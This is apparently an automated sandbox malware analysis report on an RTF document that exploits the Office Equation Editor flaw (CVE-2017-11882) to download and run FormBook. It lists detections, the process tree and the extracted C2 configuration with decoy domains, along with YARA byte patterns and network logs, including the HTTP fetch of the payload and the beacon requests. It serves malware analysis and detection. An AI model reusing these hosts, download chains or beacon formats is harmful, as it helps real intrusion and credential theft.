Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3nkW4MtwSD

Overview

General Information

Sample Name:3nkW4MtwSD (renamed file extension from none to rtf)
Analysis ID:528701
MD5:5aad2b6635b3069402aaf6ff389bea64
SHA1:a8617ddffd6c934fcf3f64c6e84b1a23ffa9d092
SHA256:718dcc870c0de487595feed4e5e43dc70fba6fa2aaac15462c0ba5c20028e7bd
Tags:rtf
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2592 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1592 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2652 cmdline: "C:\Users\Public\vbc.exe" MD5: 075BD1E3E3E0C01794EE6A84BE2C585A)
      • vbc.exe (PID: 2412 cmdline: C:\Users\Public\vbc.exe MD5: 075BD1E3E3E0C01794EE6A84BE2C585A)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • raserver.exe (PID: 1892 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
          • cmd.exe (PID: 772 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Click to see the 31 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.0.vbc.exe.400000.9.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.0.vbc.exe.400000.9.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          4.0.vbc.exe.400000.9.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          4.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            4.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 16 entries

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.199.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1592, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1592, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2652
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1592, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2652

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: 3nkW4MtwSD.rtfVirustotal: Detection: 56%Perma Link
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: 3nkW4MtwSD.rtfAvira: detected
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: 4.0.vbc.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.0.vbc.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.0.vbc.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.413553372.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.414513823.00000000008A0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.483444557.0000000000BB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, raserver.exe
            Source: Binary string: RAServer.pdb source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: global trafficDNS query: name: www.mountfrenchlodge.net
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx4_2_00407B1A
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi4_2_0040E460
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi6_2_000CE460
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx6_2_000C7B1B
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.46.199.153:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.46.199.153:80

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.cuteprofessionalscrubs.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.mountfrenchlodge.net
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.cuteprofessionalscrubs.com/9gr5/
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: global trafficHTTP traffic detected: GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.mountfrenchlodge.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.cuteprofessionalscrubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 198.46.199.153 198.46.199.153
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 16:23:57 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25Last-Modified: Thu, 25 Nov 2021 02:23:58 GMTETag: "b4a00-5d193aabff887"Accept-Ranges: bytesContent-Length: 739840Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be f3 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 3e 0b 00 00 0a 00 00 00 00 00 00 be 5b 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 5b 0b 00 4f 00 00 00 00 60 0b 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 3c 0b 00 00 20 00 00 00 3e 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 06 00 00 00 60 0b 00 00 08 00 00 00 40 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 48 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 5b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 d0 21 01 00 03 00 00 00 8c 01 00 06 7c 6a 02 00 f0 f0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 1
            Source: global trafficHTTP traffic detected: GET /70007/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.199.153Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 16:25:23 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 16:25:43 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
